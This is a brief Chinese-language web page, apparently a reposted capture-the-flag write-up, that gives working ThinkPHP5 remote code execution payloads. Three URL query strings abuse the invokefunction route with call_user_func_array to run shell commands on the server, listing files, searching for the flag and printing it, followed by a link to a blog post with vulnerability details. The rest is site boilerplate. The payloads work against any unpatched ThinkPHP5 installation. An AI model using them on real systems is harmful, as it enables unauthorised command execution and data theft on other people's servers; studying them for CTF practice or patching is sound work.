在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27
2.寻找flag ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name 'flag'");%27
3.查看flag ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27
4.漏洞详情可查看,https://blog.csdn.net/qq_40884727/article/details/101452478
|
2022-08-15
2022-08-30
2022-08-17
2022-11-06
2022-08-18
请发表评论